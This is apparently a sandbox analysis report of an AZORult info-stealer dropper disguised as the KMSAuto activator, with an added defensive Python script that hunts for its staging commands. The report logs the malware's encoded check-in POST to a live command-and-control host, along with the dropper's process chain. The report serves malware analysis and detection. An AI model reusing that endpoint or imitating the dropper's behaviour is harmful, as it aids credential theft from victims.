                                                                  Malicious:false
                                                                  Preview:regfi...i...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&...`_...............................................................................................................................................................................................................................................................................................................................................7..HvLE.n......i...........i.;.w........^|.........0...................0..hbin................p.\..,..........nk,....`_.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....`_...... ........................... .......Z.......................Root........lf......Root....nk ....`_...................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.993697571252843
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  File name:ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File size:8425933
                                                                  MD5:1ac70328ce1dea448647022c5b360a67
                                                                  SHA1:4f295ccfc7b7a2eeeec53df66d22743dbac301a6
                                                                  SHA256:addcdf9e3bac722442fb269492fea86e91d4e97ee5df4ca5c03515d534fb0c51
                                                                  SHA512:26192e10e1b095739fd2b193c199aa689b0f7d26d57bef9718ef1cee41b95e5b4113cc987cd1847a7a1f3e727f0601099bde92591d3e153ddb37fa36e4f897c5
                                                                  SSDEEP:196608:oKFIqkBPpjIwzMYsK6fg4/Lovsc+eQ5AdlH3sxAPflIKap:vkFAYsrfx8vJ+eQAd5sxAPmfp
                                                                  TLSH:788633695E98403ED946193008CBFE35B63FFE1C0A3754873BD99D5CB82B2899C1E25B
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                  Icon Hash:b369f1b1619132c1
                                                                  Entrypoint:0x425468
                                                                  Entrypoint Section:CODE
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:b8494300a1f7342d4c600a7b12e15925
                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFF0h
                                                                  mov eax, 00425388h
                                                                  call 00007F0714FC77D9h
                                                                  mov eax, 004254C8h
                                                                  call 00007F0714FCA1DFh
                                                                  mov edx, dword ptr [00428840h]
                                                                  mov dword ptr [edx], eax
                                                                  mov edx, dword ptr [00428840h]
                                                                  mov edx, dword ptr [edx]
                                                                  mov eax, dword ptr [00428848h]
                                                                  call 00007F0714FE5999h
                                                                  mov edx, dword ptr [00428840h]
                                                                  mov edx, dword ptr [edx]
                                                                  mov eax, dword ptr [004287DCh]
                                                                  call 00007F0714FDEA2Fh
                                                                  mov eax, dword ptr [00428840h]
                                                                  call 00007F0714FCD461h
                                                                  call 00007F0714FC6694h
                                                                  add byte ptr [eax], al
                                                                  add bh, bh
                                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b000 | 0x1798 | .idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x31000 | 0xb5d8 | .rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f000 | 0x1884 | .reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x2e000 | 0x18 | .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                  CODE | 0x1000 | 0x244cc | 0x24600 | False | 0.5598622744845361 | data | 6.594375997321255 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  DATA | 0x26000 | 0x2894 | 0x2a00 | False | 0.31556919642857145 | Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4230402 | 3.7937570409882295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  BSS | 0x29000 | 0x10f5 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata | 0x2b000 | 0x1798 | 0x1800 | False | 0.3977864583333333 | data | 4.8854949370233145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls | 0x2d000 | 0x8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rdata | 0x2e000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  .reloc | 0x2f000 | 0x1884 | 0x1a00 | False | 0.7889122596153846 | data | 6.586647864611828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  .rsrc | 0x31000 | 0xb5d8 | 0xb600 | False | 0.3879635989010989 | data | 4.485448040748785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  Name | RVA | Size | Type | Language | Country
                                                                  RT_ICON | 0x31360 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | |
                                                                  RT_ICON | 0x32208 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | |
                                                                  RT_ICON | 0x32ab0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | |
                                                                  RT_ICON | 0x33178 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | |
                                                                  RT_ICON | 0x336e0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | |
                                                                  RT_ICON | 0x37908 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | |
                                                                  RT_ICON | 0x39eb0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | |
                                                                  RT_ICON | 0x3af58 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | |
                                                                  RT_ICON | 0x3b8e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | |
                                                                  RT_RCDATA | 0x3bd48 | 0x10 | data | |
                                                                  RT_RCDATA | 0x3bd58 | 0x110 | data | |
                                                                  RT_GROUP_ICON | 0x3be68 | 0x84 | data | |
                                                                  RT_VERSION | 0x3beec | 0x374 | data | Russian | Russia
                                                                  RT_MANIFEST | 0x3c260 | 0x376 | XML 1.0 document, ASCII text, with CRLF line terminators | Russian | Russia
                                                                  DLL | Import
                                                                  kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                  user32.dll | GetKeyboardType, MessageBoxA
                                                                  advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                  oleaut32.dll | SysFreeString, SysReAllocStringLen
                                                                  kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                  advapi32.dll | RegCloseKey, OpenThreadToken, OpenProcessToken, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid, AdjustTokenPrivileges
                                                                  kernel32.dll | WriteFile, WinExec, WaitForSingleObject, TerminateProcess, SystemTimeToFileTime, Sleep, SetFileTime, SetFilePointer, SetErrorMode, SetEndOfFile, ReadFile, OpenProcess, MultiByteToWideChar, LocalFileTimeToFileTime, LoadLibraryA, GlobalFree, GlobalAlloc, GetVersion, GetUserDefaultLangID, GetProcAddress, GetModuleHandleA, GetLocalTime, GetLastError, GetFileTime, GetFileSize, GetExitCodeProcess, GetCurrentThread, GetCurrentProcess, FreeLibrary, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, DosDateTimeToFileTime, CompareFileTime, CloseHandle
                                                                  gdi32.dll | StretchDIBits, StretchBlt, SetWindowOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetDIBits, SetBrushOrgEx, SetBkMode, SetBkColor, SelectObject, SaveDC, RestoreDC, OffsetRgn, MoveToEx, IntersectClipRect, GetStockObject, GetPixel, GetDIBits, ExtSelectClipRgn, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CombineRgn, BitBlt
                                                                  user32.dll | WaitMessage, ValidateRect, TranslateMessage, ShowWindow, SetWindowPos, SetTimer, SetParent, SetForegroundWindow, SetFocus, SetCursor, SendMessageA, ScreenToClient, ReleaseDC, PostQuitMessage, OffsetRect, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsIconic, InvalidateRect, GetWindowRgn, GetWindowRect, GetWindowDC, GetUpdateRgn, GetSystemMetrics, GetSystemMenu, GetSysColor, GetParent, GetWindow, GetKeyState, GetFocus, GetDCEx, GetDC, GetCursorPos, GetClientRect, GetCapture, FillRect, ExitWindowsEx, EnumWindows, EndPaint, EnableWindow, EnableMenuItem, DrawIcon, DestroyWindow, DestroyIcon, DeleteMenu, CopyImage, ClientToScreen, BeginPaint, CharLowerBuffA
                                                                  advapi32.dll | RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, GetUserNameA
                                                                  kernel32.dll | WritePrivateProfileStringA, SetFileAttributesA, SetCurrentDirectoryA, RemoveDirectoryA, LoadLibraryA, GetWindowsDirectoryA, GetVersionExA, GetTimeFormatA, GetTempPathA, GetSystemDirectoryA, GetShortPathNameA, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetComputerNameA, GetCommandLineA, FindNextFileA, FindFirstFileA, ExpandEnvironmentStringsA, DeleteFileA, CreateFileA, CreateDirectoryA, CompareStringA
                                                                  gdi32.dll | GetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, AddFontResourceA
                                                                  user32.dll | wvsprintfA, SetWindowLongA, SetPropA, SendMessageA, RemovePropA, RegisterClassA, PostMessageA, PeekMessageA, MessageBoxA, LoadIconA, LoadCursorA, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetPropA, GetClassLongA, GetClassInfoA, FindWindowA, DrawTextA, DispatchMessageA, DefWindowProcA, CreateWindowExA, CallWindowProcA
                                                                  shell32.dll | SHGetFileInfoA
                                                                  comctl32.dll | ImageList_Draw, ImageList_SetBkColor, ImageList_Create, InitCommonControls
                                                                  ole32.dll | OleInitialize
                                                                  oleaut32.dll | SysAllocStringLen
                                                                  winmm.dll | timeKillEvent, timeSetEvent
                                                                  shell32.dll | ShellExecuteExA, ShellExecuteA
                                                                  cabinet.dll | FDIDestroy, FDICopy, FDICreate
                                                                  ole32.dll | OleInitialize, CoTaskMemFree, CoCreateInstance, CoUninitialize, CoInitialize
                                                                  shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHChangeNotify, SHBrowseForFolderA
                                                                  Language of compilation system | Country where language is spoken | Map
                                                                  Russian | Russia |
                                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                  03/25/23-14:27:06.642541 | TCP | 2029465 | ET TROJAN Win32/AZORult V3.2 Client Checkin M1 | 49695 | 80 | 192.168.2.3 | 141.8.192.151
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Mar 25, 2023 14:27:06.475481033 CET | 61787 | 53 | 192.168.2.3 | 8.8.8.8
                                                                  Mar 25, 2023 14:27:06.561242104 CET | 53 | 61787 | 8.8.8.8 | 192.168.2.3
                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                  Mar 25, 2023 14:27:06.475481033 CET | 192.168.2.3 | 8.8.8.8 | 0xa238 | Standard query (0) | f0355889.xsph.ru | A (IP address) | IN (0x0001) | false
                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                  Mar 25, 2023 14:27:06.561242104 CET | 8.8.8.8 | 192.168.2.3 | 0xa238 | No error (0) | f0355889.xsph.ru | | 141.8.192.151 | A (IP address) | IN (0x0001) | false
                                                                  • f0355889.xsph.ru
                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  0 | 192.168.2.3 | 49695 | 141.8.192.151 | 80 | C:\Users\user\AppData\Roaming\csrss.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Mar 25, 2023 14:27:06.642540932 CET | 93 | OUT | POST /Panel/index.php HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                  Host: f0355889.xsph.ru
                                                                  Content-Length: 107
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 48 ed 3e 3e ed 3e 32 ed 3e 3d ed 3e 3d ed 3e 33 89 28 38 8c 28 39 fa 28 39 f8 28 39 f1 28 39 f1 4f 2f fb 3d 4e ed 3e 3a ed 3e 3c
                                                                  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KH>>>2>=>=>3(8(9(9(9(9O/=N>:><
                                                                  Mar 25, 2023 14:27:06.708403111 CET | 94 | IN | HTTP/1.1 404 Not Found
                                                                  Server: openresty
                                                                  Date: Sat, 25 Mar 2023 13:27:06 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding

                                                                  Target ID:0
                                                                  Start time:14:27:01
                                                                  Start date:25/03/2023
                                                                  Path:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  Imagebase:0x400000
                                                                  File size:8425933 bytes
                                                                  MD5 hash:1AC70328CE1DEA448647022C5B360A67
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:1
                                                                  Start time:14:27:04
                                                                  Start date:25/03/2023
                                                                  Path:C:\Users\user\AppData\Roaming\csrss.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\csrss.exe" /nc /s
                                                                  Imagebase:0x400000
                                                                  File size:5027840 bytes
                                                                  MD5 hash:2A0C555C70EB25094C94E4BA5A6BA131
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: unknown
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 67%, ReversingLabs
                                                                  Reputation:low

                                                                  Target ID:2
                                                                  Start time:14:27:04
                                                                  Start date:25/03/2023
                                                                  Path:C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc
                                                                  Imagebase:0x10000
                                                                  File size:8767160 bytes
                                                                  MD5 hash:2FB86BE791B4BB4389E55DF0FEC04EB7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, ReversingLabs
                                                                  Reputation:low

                                                                  Target ID:4
                                                                  Start time:14:27:06
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136
                                                                  Imagebase:0xd60000
                                                                  File size:434592 bytes
                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:12
                                                                  Start time:14:27:22
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md "C:\Users\user\AppData\Local\MSfree Inc"
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:15
                                                                  Start time:14:27:22
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:16
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test"
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:17
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:18
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
                                                                  Imagebase:0x7ff707bb0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:19
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

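The four cmd.exe launches above, read together, are a classic dropper staging sequence: create a directory under %LOCALAPPDATA%, append to a probe file in the install directory to confirm it is writable, then delete that probe through a 64-bit cmd.exe reached via the Sysnative alias (which only resolves from a 32-bit parent, i.e. the WOW64 "KMSAuto Net.exe"). The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses process entries in the "Key:value" layout used on this page and runs a few hunt rules over them. The embedded input is constructed from the Target ID 2, 12, 16 and 18 entries in the listing above, reduced to the fields the rules use; the regular expressions and rule names are the example's own assumptions, not Joe Sandbox signatures.

```python
import ntpath
import re

# Constructed sample input: Target ID 2, 12, 16 and 18 from the process list
# above, reduced to the fields the rules below need.  Joe Sandbox prints one
# "Key:value" pair per line and separates processes with a blank line.
SAMPLE = r"""
Target ID:2
Path:C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc
Has administrator privileges:true
Reputation:low

Target ID:12
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md "C:\Users\user\AppData\Local\MSfree Inc"
Has administrator privileges:true
Reputation:high

Target ID:16
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test"
Has administrator privileges:true
Reputation:high

Target ID:18
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
Has administrator privileges:true
Reputation:high
"""

# Assumed patterns (this example's own, not Joe Sandbox rules):
# "echo <text>>>"<path>"": an append redirect used to test a directory for write access.
WRITE_PROBE = re.compile(r'\becho\b[^>]*>>\s*"?(?P<path>[^"]+?)"?\s*$', re.I)
# "del [/F /Q ...] "<name>"": removal of a file given by bare name or full path.
DELETE = re.compile(r'\bdel\b(?:\s+/\w)*\s+"?(?P<name>[^"]+?)"?\s*$', re.I)
# "md "<...>\AppData\Local\<...>"": directory creation under %LOCALAPPDATA%.
STAGING_DIR = re.compile(r'\bmd\s+"?(?P<dir>[^"]*\\AppData\\Local\\[^"]*)"?', re.I)


def parse_processes(text):
    """Split a Joe Sandbox process list into one dict per 'Target ID' block."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")   # first colon only: values contain "C:\"
        if not sep:
            continue
        if key == "Target ID":
            cur = {"Target ID": value}
            procs.append(cur)
        elif cur is not None:
            cur[key] = value
    return procs


def hunt(procs):
    """Return (Target ID, description) findings for the staging pattern above."""
    findings = []
    probes = {}   # basename of an appended file -> Target ID that appended to it
    for p in procs:
        tid = p.get("Target ID", "?")
        cmd = p.get("Commandline", "")
        if p.get("Reputation") == "low" and p.get("Has administrator privileges") == "true":
            findings.append((tid, "low-reputation image running with administrator privileges"))
        m = STAGING_DIR.search(cmd)
        if m:
            findings.append((tid, f"creates directory under %LOCALAPPDATA%: {m.group('dir')}"))
        m = WRITE_PROBE.search(cmd)
        if m:
            probes[ntpath.basename(m.group("path")).lower()] = tid
        m = DELETE.search(cmd)
        if m:
            name = ntpath.basename(m.group("name")).lower()
            if name in probes:   # same file appended earlier, now removed: write probe
                findings.append((tid, f"write probe: {name} appended by target {probes[name]} then deleted"))
        if "\\sysnative\\" in cmd.lower():
            # The Sysnative alias exists only inside WOW64 file-system redirection,
            # so a 64-bit cmd.exe reached this way was started by a 32-bit parent.
            findings.append((tid, "64-bit cmd.exe started through the Sysnative alias (32-bit parent)"))
    return findings


if __name__ == "__main__":
    for tid, msg in hunt(parse_processes(SAMPLE)):
        print(f"target {tid}: {msg}")
```

The same rules transfer directly to Sysmon Event ID 1 or EDR process-creation telemetry by feeding the CommandLine field into `hunt` instead of the sandbox listing; matching the probe file by basename rather than full path is deliberate, because the `del` in this report names only "test.test" and relies on the working directory.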
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9c995dac3923caa1844a63bb3f2947c039c349f74f887706196c77cedc66c67
                                                                    • Instruction ID: e40bfa1d0a6b044a8fcde5966f98a515bf3114ac2530f6f2bda653c43d065662
                                                                    • Opcode Fuzzy Hash: b9c995dac3923caa1844a63bb3f2947c039c349f74f887706196c77cedc66c67
                                                                    • Instruction Fuzzy Hash: 24022772B042218BD708CE18C4902BDBBE2FBC5345F154A3EF59697A86E774E884CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce8d286d1523e8950fc12ac4b8cd7b5ce741b602c791c303a6bfb49191d7ac93
                                                                    • Instruction ID: 748e40044e32f92cdfd9f1eaf8fd1d0b3b7355d1d04052036a195310ced6c53f
                                                                    • Opcode Fuzzy Hash: ce8d286d1523e8950fc12ac4b8cd7b5ce741b602c791c303a6bfb49191d7ac93
                                                                    • Instruction Fuzzy Hash: 55D1C1B2A58A664FD364DF49DC802357762AFC8200F9B067DC66407363CA78F953DBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b65dd5cc14a9fce525a6856849c7e0cb13a5ff6bafc99ec235d207119c379bd
                                                                    • Instruction ID: 2f79b6cbf95d27c57ddec0c3ef75ff1c277802ac6e64d19b209ae31762c648a5
                                                                    • Opcode Fuzzy Hash: 9b65dd5cc14a9fce525a6856849c7e0cb13a5ff6bafc99ec235d207119c379bd
                                                                    • Instruction Fuzzy Hash: 1A917DB29083658FC315DF49D88455AF7E1BFD4304F0B86AEE9985B322E270A945CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
